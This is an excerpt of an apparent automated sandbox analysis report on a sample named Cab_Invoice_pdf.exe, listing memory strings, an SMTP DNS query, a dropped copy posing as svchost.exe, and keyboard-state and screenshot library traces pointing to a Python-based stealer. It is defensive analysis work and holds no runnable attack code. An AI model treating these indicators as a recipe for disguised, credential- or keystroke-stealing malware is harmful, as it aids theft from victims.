Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl#
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563409089.000000000303B000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl(
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565635823.0000000003357000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crla
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crlc
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crlr
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565635823.0000000003357000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crte
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crtloc
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der
Source: Cab_Invoice_pdf.exe, 00000003.00000002.561957935.0000000000EF1000.00000004.00000020.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.565635823.0000000003357000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.derB2
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.dere2
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.dery1
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der$
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der81
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.derv2
Source: svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: Cab_Invoice_pdf.exe, 00000003.00000003.329270034.000000000301F000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563150895.0000000002FF4000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.329242201.0000000002FF9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.475545199.000000000107C000.00000004.00000001.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: Cab_Invoice_pdf.exe, 00000003.00000002.562902379.0000000002F00000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327450088.0000000002FD1000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000003.327365430.0000000000EE5000.00000004.00000001.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: Cab_Invoice_pdf.exe, 00000003.00000003.327138689.0000000000EA7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562961812.0000000002F40000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: Cab_Invoice_pdf.exe, 00000003.00000003.324419871.0000000000EC7000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.562792705.0000000002D90000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.470092422.0000000002900000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.493118134.0000000003500000.00000004.00000001.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
Source: Cab_Invoice_pdf.exe, 00000003.00000002.565049121.00000000031C0000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563024174.0000000002F90000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481183510.00000000036C0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/BoboTiG/python-mss
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569019026.000000006F31E000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567155238.000000006EB1A000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.567064488.000000006EAEB000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568756682.000000006F2D8000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563492402.000000000305D000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563701766.0000000003090000.00000004.00000001.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: Cab_Invoice_pdf.exe, 00000003.00000002.563576377.000000000307D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/mail/?p=BadCredentials
Source: svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.452020666.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.449217858.0000000002C1F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.483041978.000000000381F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000C.00000003.389695797.0000020D18381000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.389793962.0000020D183A2000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567452427.000000006EBF1000.00000002.00020000.sdmp, Cab_Invoice_pdf.exe, 00000003.00000002.568654900.000000006EE48000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449203486.0000000002C0C000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482937530.000000000380C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmpString found in binary or memory: https://www.openssl.org/H
Source: svchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.c
Source: svchost.exe, 0000000C.00000003.391558399.0000020D1839A000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391525038.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391498040.0000020D183B1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391546190.0000020D18389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.391580111.0000020D18802000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknownDNS traffic detected: queries for: smtp.gmail.com
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA74420 PyArg_ParseTuple,PyEval_SaveThread,GetKeyboardState,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,19_2_6DA74420

System Summary:

barindex
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Cab_Invoice_pdf.exe
Source: initial sampleStatic PE information: Filename: Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA74C50 PyArg_ParseTuple,PyEval_SaveThread,ExitWindowsEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,19_2_6DA74C50
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA74BD0 PyArg_ParseTuple,PyEval_SaveThread,ExitWindowsEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,_Py_NoneStruct,_Py_NoneStruct,19_2_6DA74BD0
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131B9121_2_0131B912
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0132E8DF1_2_0132E8DF
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013158C21_2_013158C2
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0131BB411_2_0131BB41
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013292A01_2_013292A0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013174401_2_01317440
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01316CA01_2_01316CA0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_0132974E1_2_0132974E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01314E601_2_01314E60
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0131B9123_2_0131B912
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0132E8DF3_2_0132E8DF
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_013158C23_2_013158C2
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0131BB413_2_0131BB41
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_013292A03_2_013292A0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_013174403_2_01317440
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01316CA03_2_01316CA0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_0132974E3_2_0132974E
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01314E603_2_01314E60
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F2A703_2_6E2F2A70
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F30303_2_6E2F3030
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BDE8DF11_2_00BDE8DF
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC58C211_2_00BC58C2
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BCB91211_2_00BCB912
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD92A011_2_00BD92A0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BCBB4111_2_00BCBB41
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC6CA011_2_00BC6CA0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC744011_2_00BC7440
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC4E6011_2_00BC4E60
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BD974E11_2_00BD974E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BDE8DF19_2_00BDE8DF
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC58C219_2_00BC58C2
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BCB91219_2_00BCB912
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD92A019_2_00BD92A0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BCBB4119_2_00BCBB41
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC6CA019_2_00BC6CA0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC744019_2_00BC7440
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC4E6019_2_00BC4E60
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BD974E19_2_00BD974E
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD859022_2_6DAD8590
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE6DF022_2_6DAE6DF0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADD1CB22_2_6DADD1CB
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADB1C022_2_6DADB1C0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD61D522_2_6DAD61D5
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD69D022_2_6DAD69D0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADE13822_2_6DADE138
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADD10822_2_6DADD108
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE391022_2_6DAE3910
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADDCB722_2_6DADDCB7
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADC8ED22_2_6DADC8ED
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD5CC022_2_6DAD5CC0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADC43022_2_6DADC430
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE647022_2_6DAE6470
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADD04522_2_6DADD045
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADD84322_2_6DADD843
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE73A922_2_6DAE73A9
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE67D022_2_6DAE67D0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE573022_2_6DAE5730
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE730822_2_6DAE7308
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADAF1022_2_6DADAF10
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADC34022_2_6DADC340
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD4B4022_2_6DAD4B40
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADDADB22_2_6DADDADB
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAE62D022_2_6DAE62D0
